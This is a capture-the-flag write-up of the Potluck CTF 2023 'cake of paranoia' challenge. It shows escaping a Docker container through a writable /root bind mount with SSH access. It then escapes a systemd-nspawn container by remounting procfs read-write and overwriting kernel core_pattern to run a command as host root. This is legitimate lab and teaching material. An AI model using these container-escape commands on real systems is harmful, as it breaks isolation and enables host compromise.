1A layer cake of paranoia. Please enjoy, and don't be afraid to take seconds.I blooded the chal :) with a cheese strat way easier than intended challenge01-dist.tgz
We’re provided a rootfs and tcp connection info which gets us a shell.
1potluck-ctf-2023/cake-of-paranoia/rootfs2❯ fd3
4etc/systemd/nspawn/5etc/systemd/nspawn/ubuntu.nspawn6etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/7etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/50-DeviceAllow.conf8...9etc/systemd/system/multi-user.target.wants/machines.target10etc/systemd/system/machines.target.wants/11etc/systemd/system/machines.target.wants/systemd-nspawn@ubuntu.service12...13var/lib/machines/ubuntu/14usr/lib/libnss_mymachines.so.215usr/share/man/man1/systemd-machine-id-setup.1.gz16var/lib/machines/ubuntu/opt/17var/lib/machines/ubuntu/opt/containerd/18var/lib/machines/ubuntu/opt/containerd/bin/19var/lib/machines/ubuntu/opt/containerd/lib/20var/lib/machines/ubuntu/bin21var/lib/machines/ubuntu/sys/22var/lib/machines/ubuntu/media/23var/lib/machines/ubuntu/lib24var/lib/machines/ubuntu/run/25var/lib/machines/ubuntu/boot/26...27var/lib/machines/ubuntu/var/lib/docker/28var/lib/machines/ubuntu/var/lib/docker/engine-id29var/lib/machines/ubuntu/var/lib/docker/runtimes/15 collapsed lines
30var/lib/machines/ubuntu/var/lib/docker/network/31var/lib/machines/ubuntu/var/lib/docker/network/files/32var/lib/machines/ubuntu/var/lib/docker/network/files/local-kv.db33var/lib/machines/ubuntu/var/lib/docker/volumes/34var/lib/machines/ubuntu/var/lib/docker/volumes/metadata.db35var/lib/machines/ubuntu/var/lib/docker/volumes/backingFsBlockDev36var/lib/machines/ubuntu/var/lib/docker/containers/37var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/38var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log39var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/mounts/40var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts41var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostconfig.json42var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf.hash43var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf44var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/config.v2.jsonExamining the rootfs and connecting to the shell the general structure of the challenge becomes clear.
We connect into a shell inside a docker container. This docker container is running inside a systemd nspawn container. This nspawn container is running inside an arch vm and the flag is present in /flag.txt inside the top level vm.
1// runs every minute by cron2const GLib = imports.gi.GLib;3
4if (!GLib.access("/flag.txt", 0)) {5 console.log("yay, the flag's still there!");6} else {7 console.log("whoops, the flag's gone");8}We’ll need to do two container escapes — first from docker to nspawn and then from nspawn to the top level. I’ll first examine the docker container for any security-relevant configuration.
1> cat /proc/self/status | grep CapEff2CapEff: 00000000a80425fb3> capsh --decode=00000000a80425fb40x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcapCapabilities are more or less uninteresting — default and nothing that can be leverage to break out. Looking inside the container config though shows something very suspicious — that /root is mounted as a volume inside the container.
1{2 "StreamConfig": {},3 "State": {4 "Running": true,5 "Paused": false,6 "Restarting": false,7 "OOMKilled": false,8 "RemovalInProgress": false,9 "Dead": false,10 "Pid": 466,11 "ExitCode": 0,12 "Error": "",13 "StartedAt": "2023-11-29T08:37:47.639966172Z",14 "FinishedAt": "0001-01-01T00:00:00Z",15 "Health": null16 },17 "ID": "68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221",18 "Created": "2023-11-29T08:37:46.082139124Z",19 "Managed": false,20 "Path": "socat",21 "Args": [22 "-d",23 "-d",24 "TCP-LISTEN:1337,reuseaddr,fork",25 "EXEC:/bin/sh,stderr"26 ],27 "Config": {28 "Hostname": "68be6028e3e4",29 "Domainname": "",111 collapsed lines
30 "User": "",31 "AttachStdin": false,32 "AttachStdout": false,33 "AttachStderr": false,34 "ExposedPorts": {35 "1337/tcp": {}36 },37 "Tty": false,38 "OpenStdin": false,39 "StdinOnce": false,40 "Env": [41 "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"42 ],43 "Cmd": null,44 "Image": "entrypoint",45 "Volumes": null,46 "WorkingDir": "",47 "Entrypoint": [48 "socat",49 "-d",50 "-d",51 "TCP-LISTEN:1337,reuseaddr,fork",52 "EXEC:/bin/sh,stderr"53 ],54 "OnBuild": null,55 "Labels": {}56 },57 "Image": "sha256:8adf4a1c6bc350ad16f843424110069b69e4423ef4d87daa39c38ab001659166",58 "ImageManifest": null,59 "NetworkSettings": {60 "Bridge": "",61 "SandboxID": "e1a8b0eceb93d2ed34f0e5f0c5935963554cf35071a19b7dbb692c1e25540c7e",62 "HairpinMode": false,63 "LinkLocalIPv6Address": "",64 "LinkLocalIPv6PrefixLen": 0,65 "Networks": {66 "bridge": {67 "IPAMConfig": null,68 "Links": null,69 "Aliases": null,70 "NetworkID": "8a082b6e4f0e46624e5ca1cc014fc1a5a52f44d6b4ce65cc6a015b7391de87de",71 "EndpointID": "07628d86f5bf567d848707f7f1af75d72bf89059d19349ab71f21b6d0fdf25bc",72 "Gateway": "172.17.0.1",73 "IPAddress": "172.17.0.2",74 "IPPrefixLen": 16,75 "IPv6Gateway": "",76 "GlobalIPv6Address": "",77 "GlobalIPv6PrefixLen": 0,78 "MacAddress": "02:42:ac:11:00:02",79 "DriverOpts": null,80 "IPAMOperational": false81 }82 },83 "Service": null,84 "Ports": {85 "1337/tcp": [86 {87 "HostIp": "0.0.0.0",88 "HostPort": "1337"89 },90 {91 "HostIp": "::",92 "HostPort": "1337"93 }94 ]95 },96 "SandboxKey": "/var/run/docker/netns/e1a8b0eceb93",97 "SecondaryIPAddresses": null,98 "SecondaryIPv6Addresses": null,99 "IsAnonymousEndpoint": true,100 "HasSwarmEndpoint": false101 },102 "LogPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log",103 "Name": "/jovial_mcnulty",104 "Driver": "overlay2",105 "OS": "linux",106 "RestartCount": 0,107 "HasBeenStartedBefore": true,108 "HasBeenManuallyStopped": false,109 "MountPoints": {110 "/root": {111 "Source": "/root",112 "Destination": "/root",113 "RW": true,114 "Name": "",115 "Driver": "",116 "Type": "bind",117 "Propagation": "rprivate",118 "Spec": {119 "Type": "bind",120 "Source": "/root",121 "Target": "/root"122 },123 "SkipMountpointCreation": false124 }125 },126 "SecretReferences": null,127 "ConfigReferences": null,128 "MountLabel": "",129 "ProcessLabel": "",130 "AppArmorProfile": "",131 "SeccompProfile": "",132 "NoNewPrivileges": false,133 "HostnamePath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostname",134 "HostsPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts",135 "ShmPath": "",136 "ResolvConfPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf",137 "LocalLogCacheMeta": {138 "HaveNotifyEnabled": false139 }140}Following up on that shows that we have write access to root’s .ssh directory, sshd is running on the host, and the host and docker container are networked together. After fighting for a long time with the IO, I managed to get dropbear on inside the container and confirmed I could ssh up a level.
1> cat /proc/self/status | grep CapEff2CapEff: 00000000fdecbfff3> capsh --decode=00000000fdecbfff40x00000000fdecbfff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_owner,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcapLooking at the config shows we are explicitly allowed to invoke add_key, keyctl, or bpf syscalls inside the container.
1[Exec]2Boot=true3PrivateUsers=false4SystemCallFilter=add_key keyctl bpf5
6[Network]7Zone=guests8Port=13379
10[Files]11Bind=/dev/fuseI know the author well enough to know that the intended solution is bpf fuckery (with the bpf syscall and cap_sys_admin) but I don’t know bpf well and didn’t want to do that. Fortunately for me, cap_sys_admin is an unreasonably powerful capability and there are other routes.
Systemd, by default, mounts procfs and sys as read-only. It does not prevent a user with the appropriate (and default) capabilities from mounting procfs again r/w. Once you have write access to procfs it’s trivial to escalate privileges by modifying core_pattern.
1> mkdir proc2> mount -t proc proc proc3> echo '|/usr/bin/cp /flag.txt /var/lib/machines/ubuntu/flag.txt' > proc/sys/kernel/core_pattern4./crash5> cat /flag.txt6potluck{sometimes-we-all-get-in-a-little-over-our-heads-dont-we}